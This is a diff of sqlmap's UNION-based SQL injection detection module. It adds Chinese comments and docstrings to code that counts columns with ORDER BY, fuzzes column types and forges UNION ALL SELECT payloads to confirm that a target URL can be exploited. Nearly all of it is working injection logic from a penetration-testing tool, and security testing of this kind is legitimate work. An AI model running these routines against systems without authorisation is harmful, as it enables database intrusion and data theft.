@ -5,68 +5,96 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file ' LICENSE ' for copying permission
"""
import itertools
import logging
import random
import re
from lib . core . agent import agent
from lib . core . common import average
from lib . core . common import Backend
from lib . core . common import getPublicTypeMembers
from lib . core . common import isNullValue
from lib . core . common import listToStrValue
from lib . core . common import popValue
from lib . core . common import pushValue
from lib . core . common import randomInt
from lib . core . common import randomStr
from lib . core . common import readInput
from lib . core . common import removeReflectiveValues
from lib . core . common import setTechnique
from lib . core . common import singleTimeLogMessage
from lib . core . common import singleTimeWarnMessage
from lib . core . common import stdev
from lib . core . common import wasLastResponseDBMSError
from lib . core . compat import xrange
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
from lib . core . data import queries
from lib . core . decorators import stackedmethod
from lib . core . dicts import FROM_DUMMY_TABLE
from lib . core . enums import FUZZ_UNION_COLUMN
from lib . core . enums import PAYLOAD
from lib . core . settings import FUZZ_UNION_ERROR_REGEX
from lib . core . settings import FUZZ_UNION_MAX_COLUMNS
from lib . core . settings import LIMITED_ROWS_TEST_NUMBER
from lib . core . settings import MAX_RATIO
from lib . core . settings import MIN_RATIO
from lib . core . settings import MIN_STATISTICAL_RANGE
from lib . core . settings import MIN_UNION_RESPONSES
from lib . core . settings import NULL
from lib . core . settings import ORDER_BY_MAX
from lib . core . settings import ORDER_BY_STEP
from lib . core . settings import UNION_MIN_RESPONSE_CHARS
from lib . core . settings import UNION_STDEV_COEFF
from lib . core . unescaper import unescaper
from lib . request . comparison import comparison
from lib . request . connect import Connect as Request
# 导入所需的Python标准库和自定义模块
import itertools # 用于创建迭代器
import logging # 用于日志记录
import random # 用于生成随机数
import re # 用于正则表达式操作
# 导入自定义的工具函数和类
from lib . core . agent import agent # SQL注入代理模块
from lib . core . common import average # 计算平均值
from lib . core . common import Backend # 数据库后端
from lib . core . common import getPublicTypeMembers # 获取公共类型成员
from lib . core . common import isNullValue # 判断是否为空值
from lib . core . common import listToStrValue # 列表转字符串
from lib . core . common import popValue # 弹出值
from lib . core . common import pushValue # 压入值
from lib . core . common import randomInt # 生成随机整数
from lib . core . common import randomStr # 生成随机字符串
from lib . core . common import readInput # 读取用户输入
from lib . core . common import removeReflectiveValues # 移除反射值
from lib . core . common import setTechnique # 设置注入技术
from lib . core . common import singleTimeLogMessage # 单次日志消息
from lib . core . common import singleTimeWarnMessage # 单次警告消息
from lib . core . common import stdev # 计算标准差
from lib . core . common import wasLastResponseDBMSError # 检查上次响应是否为数据库错误
from lib . core . compat import xrange # 兼容Python2/3的range函数
from lib . core . data import conf # 配置数据
from lib . core . data import kb # 知识库数据
from lib . core . data import logger # 日志记录器
from lib . core . data import queries # SQL查询语句
from lib . core . decorators import stackedmethod # 堆栈方法装饰器
from lib . core . dicts import FROM_DUMMY_TABLE # 虚拟表字典
from lib . core . enums import FUZZ_UNION_COLUMN # UNION列模糊测试枚举
from lib . core . enums import PAYLOAD # 载荷类型枚举
from lib . core . settings import FUZZ_UNION_ERROR_REGEX # UNION错误正则表达式
from lib . core . settings import FUZZ_UNION_MAX_COLUMNS # UNION最大列数
from lib . core . settings import LIMITED_ROWS_TEST_NUMBER # 有限行测试数
from lib . core . settings import MAX_RATIO # 最大比率
from lib . core . settings import MIN_RATIO # 最小比率
from lib . core . settings import MIN_STATISTICAL_RANGE # 最小统计范围
from lib . core . settings import MIN_UNION_RESPONSES # 最小UNION响应数
from lib . core . settings import NULL # NULL值常量
from lib . core . settings import ORDER_BY_MAX # ORDER BY最大值
from lib . core . settings import ORDER_BY_STEP # ORDER BY步长
from lib . core . settings import UNION_MIN_RESPONSE_CHARS # UNION最小响应字符数
from lib . core . settings import UNION_STDEV_COEFF # UNION标准差系数
from lib . core . unescaper import unescaper # SQL转义处理器
from lib . request . comparison import comparison # 响应比较
from lib . request . connect import Connect as Request # HTTP请求处理
def _findUnionCharCount ( comment , place , parameter , value , prefix , suffix , where = PAYLOAD . WHERE . ORIGINAL ) :
"""
Finds number of columns affected by UNION based injection
查找UNION注入所影响的列数
参数 :
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
where - 注入位置 ( 默认为原始位置 )
返回 :
找到的列数 , 如果未找到则返回None
"""
retVal = None
@stackedmethod
def _orderByTechnique ( lowerCount = None , upperCount = None ) :
"""
使用ORDER BY技术来确定列数
参数 :
lowerCount - 最小列数
upperCount - 最大列数
返回 :
找到的列数
"""
def _orderByTest ( cols ) :
"""
测试指定列数的ORDER BY语句是否有效
"""
query = agent . prefixQuery ( " ORDER BY %d " % cols , prefix = prefix )
query = agent . suffixQuery ( query , suffix = suffix , comment = comment )
payload = agent . payload ( newValue = query , place = place , parameter = parameter , where = where )
page , headers , code = Request . queryPage ( payload , place = place , content = True , raise404 = False )
return not any ( re . search ( _ , page or " " , re . I ) and not re . search ( _ , kb . pageTemplate or " " , re . I ) for _ in ( " (warning|error): " , " order (by|clause) " , " unknown column " , " failed " ) ) and not kb . heavilyDynamic and comparison ( page , headers , code ) or re . search ( r " data types cannot be compared or sorted " , page or " " , re . I ) is not None
# 如果ORDER BY 1成功但ORDER BY随机大数失败,说明ORDER BY技术可用
if _orderByTest ( 1 if lowerCount is None else lowerCount ) and not _orderByTest ( randomInt ( ) if upperCount is None else upperCount + 1 ) :
infoMsg = " ' ORDER BY ' technique appears to be usable. "
infoMsg + = " This should reduce the time needed "
@ -75,6 +103,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
infoMsg + = " range for current UNION query injection technique test "
singleTimeLogMessage ( infoMsg )
# 二分查找确定准确的列数
lowCols , highCols = 1 if lowerCount is None else lowerCount , ORDER_BY_STEP if upperCount is None else upperCount
found = None
while not found :
@ -97,12 +126,14 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
return found
try :
# 保存当前错误状态
pushValue ( kb . errorIsNone )
items , ratios = [ ] , [ ]
kb . errorIsNone = False
lowerCount , upperCount = conf . uColsStart , conf . uColsStop
if kb . orderByColumns is None and ( lowerCount == 1 or conf . uCols ) : # Note: ORDER BY is not bullet-proof
# 如果ORDER BY列数未知且起始列为1或指定了列数,尝试使用ORDER BY技术
if kb . orderByColumns is None and ( lowerCount == 1 or conf . uCols ) :
found = _orderByTechnique ( lowerCount , upperCount ) if conf . uCols else _orderByTechnique ( )
if found :
@ -113,12 +144,14 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
elif kb . futileUnion :
return None
# 确保测试范围足够大
if abs ( upperCount - lowerCount ) < MIN_UNION_RESPONSES :
upperCount = lowerCount + MIN_UNION_RESPONSES
min_ , max_ = MAX_RATIO , MIN_RATIO
pages = { }
# 对每个可能的列数进行测试
for count in xrange ( lowerCount , upperCount + 1 ) :
query = agent . forgeUnionQuery ( ' ' , - 1 , count , comment , prefix , suffix , kb . uChar , where )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
@ -127,11 +160,13 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
if not isNullValue ( kb . uChar ) :
pages [ count ] = page
# 计算响应相似度
ratio = comparison ( page , headers , code , getRatioValue = True ) or MIN_RATIO
ratios . append ( ratio )
min_ , max_ = min ( min_ , ratio ) , max ( max_ , ratio )
items . append ( ( count , ratio ) )
# 如果使用了特定字符进行UNION注入测试
if not isNullValue ( kb . uChar ) :
value = re . escape ( kb . uChar . strip ( " ' " ) )
for regex in ( value , r ' > \ s* %s \ s*< ' % value ) :
@ -140,6 +175,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
retVal = contains [ 0 ]
break
# 如果没有找到明确的列数,使用统计分析方法
if not retVal :
if min_ in ratios :
ratios . pop ( ratios . index ( min_ ) )
@ -154,6 +190,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
elif item [ 1 ] == max_ :
maxItem = item
# 根据响应相似度的分布确定列数
if all ( _ == min_ and _ != max_ for _ in ratios ) :
retVal = maxItem [ 0 ]
@ -175,6 +212,7 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
finally :
kb . errorIsNone = popValue ( )
# 如果找到了列数,输出信息
if retVal :
infoMsg = " target URL appears to be UNION injectable with %d columns " % retVal
singleTimeLogMessage ( infoMsg , logging . INFO , re . sub ( r " \ d+ " , ' N ' , infoMsg ) )
@ -182,14 +220,29 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
return retVal
def _fuzzUnionCols ( place , parameter , prefix , suffix ) :
"""
模糊测试UNION查询的列类型
参数 :
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
返回 :
成功时返回列类型模板 , 失败返回None
"""
retVal = None
# 如果已识别数据库类型且页面模板中没有UNION错误,且知道ORDER BY列数
if Backend . getIdentifiedDbms ( ) and not re . search ( FUZZ_UNION_ERROR_REGEX , kb . pageTemplate or " " ) and kb . orderByColumns :
comment = queries [ Backend . getIdentifiedDbms ( ) ] . comment . query
# 获取所有可能的列类型组合
choices = getPublicTypeMembers ( FUZZ_UNION_COLUMN , True )
random . shuffle ( choices )
# 测试每种列类型组合
for candidate in itertools . product ( choices , repeat = kb . orderByColumns ) :
if retVal :
break
@ -198,11 +251,13 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
else :
candidate = [ _ . replace ( FUZZ_UNION_COLUMN . INTEGER , str ( randomInt ( ) ) ) . replace ( FUZZ_UNION_COLUMN . STRING , " ' %s ' " % randomStr ( 20 ) ) for _ in candidate ]
# 构造并测试UNION查询
query = agent . prefixQuery ( " UNION ALL SELECT %s %s " % ( ' , ' . join ( candidate ) , FROM_DUMMY_TABLE . get ( Backend . getIdentifiedDbms ( ) , " " ) ) , prefix = prefix )
query = agent . suffixQuery ( query , suffix = suffix , comment = comment )
payload = agent . payload ( newValue = query , place = place , parameter = parameter , where = PAYLOAD . WHERE . NEGATIVE )
page , headers , code = Request . queryPage ( payload , place = place , content = True , raise404 = False )
# 如果没有UNION错误,检查字符串列是否在响应中
if not re . search ( FUZZ_UNION_ERROR_REGEX , page or " " ) :
for column in candidate :
if column . startswith ( " ' " ) and column . strip ( " ' " ) in ( page or " " ) :
@ -212,66 +267,82 @@ def _fuzzUnionCols(place, parameter, prefix, suffix):
return retVal
def _unionPosition ( comment , place , parameter , prefix , suffix , count , where = PAYLOAD . WHERE . ORIGINAL ) :
"""
确定UNION注入的有效列位置
参数 :
comment - SQL注释
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
count - 列数
where - 注入位置
返回 :
( 有效载荷 , 注入向量 ) 元组
"""
validPayload = None
vector = None
# 生成所有可能的列位置
positions = [ _ for _ in xrange ( 0 , count ) ]
# Unbiased approach for searching appropriate usable column
# 随机打乱位置顺序,以避免偏差
random . shuffle ( positions )
# 使用两种不同长度的随机字符串进行测试
for charCount in ( UNION_MIN_RESPONSE_CHARS << 2 , UNION_MIN_RESPONSE_CHARS ) :
if vector :
break
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target URL is
# affected by an exploitable union SQL injection vulnerability
# 测试每个列位置
for position in positions :
# Prepare expression with delimiters
# 准备带分隔符的测试字符串
randQuery = randomStr ( charCount )
phrase = ( " %s %s %s " % ( kb . chars . start , randQuery , kb . chars . stop ) ) . lower ( )
randQueryProcessed = agent . concatQuery ( " \' %s \' " % randQuery )
randQueryUnescaped = unescaper . escape ( randQueryProcessed )
# Forge the union SQL injection request
# 构造UNION注入查询
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
# 发送请求并检查响应
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
content = ( " %s %s " % ( removeReflectiveValues ( page , payload ) or " " , removeReflectiveValues ( listToStrValue ( headers . headers if headers else None ) , payload , True ) or " " ) ) . lower ( )
# 如果测试字符串在响应中,说明找到了可用的列位置
if content and phrase in content :
validPayload = payload
kb . unionDuplicates = len ( re . findall ( phrase , content , re . I ) ) > 1
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , conf . forcePartial , kb . tableFrom , kb . unionTemplate )
# 如果是在原始位置测试,进行额外确认
if where == PAYLOAD . WHERE . ORIGINAL :
# Prepare expression with delimiters
# 准备第二个测试字符串
randQuery2 = randomStr ( charCount )
phrase2 = ( " %s %s %s " % ( kb . chars . start , randQuery2 , kb . chars . stop ) ) . lower ( )
randQueryProcessed2 = agent . concatQuery ( " \' %s \' " % randQuery2 )
randQueryUnescaped2 = unescaper . escape ( randQueryProcessed2 )
# Confirm that it is a full union SQL injection
# 使用多个UNION测试完整性
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where , multipleUnions = randQueryUnescaped2 )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
content = ( " %s %s " % ( page or " " , listToStrValue ( headers . headers if headers else None ) or " " ) ) . lower ( )
# 如果两个测试字符串都不在响应中,切换到部分模式
if not all ( _ in content for _ in ( phrase , phrase2 ) ) :
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , True , kb . tableFrom , kb . unionTemplate )
elif not kb . unionDuplicates :
# 测试行数限制
fromTable = " FROM ( %s ) AS %s " % ( " UNION " . join ( " SELECT %d %s %s " % ( _ , FROM_DUMMY_TABLE . get ( Backend . getIdentifiedDbms ( ) , " " ) , " AS %s " % randomStr ( ) if _ == 0 else " " ) for _ in xrange ( LIMITED_ROWS_TEST_NUMBER ) ) , randomStr ( ) )
# Check for limited row output
query = agent . forgeUnionQuery ( randQueryUnescaped , position , count , comment , prefix , suffix , kb . uChar , where , fromTable = fromTable )
payload = agent . payload ( place = place , parameter = parameter , newValue = query , where = where )
# Perform the request
page , headers , _ = Request . queryPage ( payload , place = place , content = True , raise404 = False )
content = ( " %s %s " % ( removeReflectiveValues ( page , payload ) or " " , removeReflectiveValues ( listToStrValue ( headers . headers if headers else None ) , payload , True ) or " " ) ) . lower ( )
if content . count ( phrase ) > 0 and content . count ( phrase ) < LIMITED_ROWS_TEST_NUMBER :
@ -279,6 +350,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
logger . warning ( warnMsg )
vector = ( position , count , comment , prefix , suffix , kb . uChar , where , kb . unionDuplicates , True , kb . tableFrom , kb . unionTemplate )
# 检查是否是UNION/错误混合注入情况
unionErrorCase = kb . errorIsNone and wasLastResponseDBMSError ( )
if unionErrorCase and count > 1 :
@ -292,15 +364,27 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
return validPayload , vector
def _unionConfirm ( comment , place , parameter , prefix , suffix , count ) :
"""
确认UNION SQL注入并获取精确的列位置
参数 :
comment - SQL注释
place - 注入点位置
parameter - 注入参数
prefix - SQL前缀
suffix - SQL后缀
count - 列数
返回 :
( 有效载荷 , 注入向量 ) 元组
"""
validPayload = None
vector = None
# Confirm the union SQL injection and get the exact column
# position which can be used to extract data
# 在原始位置确认UNION注入
validPayload , vector = _unionPosition ( comment , place , parameter , prefix , suffix , count )
# Assure that the above function found the exploitable full union
# SQL injection position
# 如果原始位置未找到,尝试在否定位置确认
if not validPayload :
validPayload , vector = _unionPosition ( comment , place , parameter , prefix , suffix , count , where = PAYLOAD . WHERE . NEGATIVE )
@ -308,9 +392,19 @@ def _unionConfirm(comment, place, parameter, prefix, suffix, count):
def _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix ) :
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability . The test is done up to 50 columns
on the target database table
通过字符暴力测试目标URL是否存在UNION SQL注入漏洞
测试最多进行50列
参数 :
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
返回 :
( 有效载荷 , 注入向量 ) 元组
"""
validPayload = None
@ -319,7 +413,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
uChars = ( conf . uChar , kb . uChar )
where = PAYLOAD . WHERE . ORIGINAL if isNullValue ( kb . uChar ) else PAYLOAD . WHERE . NEGATIVE
# In case that user explicitly stated number of columns affected
# 如果用户明确指定了列数
if conf . uColsStop == conf . uColsStart :
count = conf . uColsStart
else :
@ -328,6 +422,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if count :
validPayload , vector = _unionConfirm ( comment , place , parameter , prefix , suffix , count )
# 如果未找到有效载荷且未设置某些配置,尝试模糊测试
if not all ( ( validPayload , vector ) ) and not all ( ( conf . uChar , conf . dbms , kb . unionTemplate ) ) :
if Backend . getIdentifiedDbms ( ) and kb . orderByColumns and kb . orderByColumns < FUZZ_UNION_MAX_COLUMNS :
if kb . fuzzUnionTest is None :
@ -341,6 +436,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
warnMsg = " if UNION based SQL injection is not detected, "
warnMsg + = " please consider "
# 如果NULL值注入不可用,提示尝试使用随机整数
if not conf . uChar and count > 1 and kb . uChar == NULL and conf . uValues is None :
message = " injection not exploitable with NULL values. Do you want to try with a random integer value for option ' --union-char ' ? [Y/n] "
@ -351,6 +447,7 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
conf . uChar = kb . uChar = str ( randomInt ( 2 ) )
validPayload , vector = _unionConfirm ( comment , place , parameter , prefix , suffix , count )
# 提示强制指定数据库类型
if not conf . dbms :
if not conf . uChar :
warnMsg + = " and/or try to force the "
@ -361,7 +458,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
if not all ( ( validPayload , vector ) ) and not warnMsg . endswith ( " consider " ) :
singleTimeWarnMessage ( warnMsg )
if orderBy is None and kb . orderByColumns is not None and not all ( ( validPayload , vector ) ) : # discard ORDER BY results (not usable - e.g. maybe invalid altogether)
# 如果ORDER BY结果无效,丢弃并重试
if orderBy is None and kb . orderByColumns is not None and not all ( ( validPayload , vector ) ) :
conf . uChar , kb . uChar = uChars
validPayload , vector = _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix )
@ -370,10 +468,22 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix)
@stackedmethod
def unionTest ( comment , place , parameter , value , prefix , suffix ) :
"""
This method tests if the target URL is affected by an union
SQL injection vulnerability . The test is done up to 3 * 50 times
测试目标URL是否存在UNION SQL注入漏洞
最多测试3 * 50 次
参数 :
comment - SQL注释
place - 注入点位置
parameter - 注入参数
value - 参数值
prefix - SQL前缀
suffix - SQL后缀
返回 :
( 有效载荷 , 注入向量 ) 元组
"""
# 直连模式下不进行测试
if conf . direct :
return
@ -381,6 +491,7 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
setTechnique ( PAYLOAD . TECHNIQUE . UNION )
try :
# 如果使用否定逻辑,保存当前状态
if negativeLogic :
pushValue ( kb . negativeLogic )
pushValue ( conf . string )
@ -389,13 +500,16 @@ def unionTest(comment, place, parameter, value, prefix, suffix):
kb . negativeLogic = False
conf . string = conf . code = None
# 进行UNION注入测试
validPayload , vector = _unionTestByCharBruteforce ( comment , place , parameter , value , prefix , suffix )
finally :
# 恢复否定逻辑状态
if negativeLogic :
conf . code = popValue ( )
conf . string = popValue ( )
kb . negativeLogic = popValue ( )
# 移除载荷分隔符
if validPayload :
validPayload = agent . removePayloadDelimiters ( validPayload )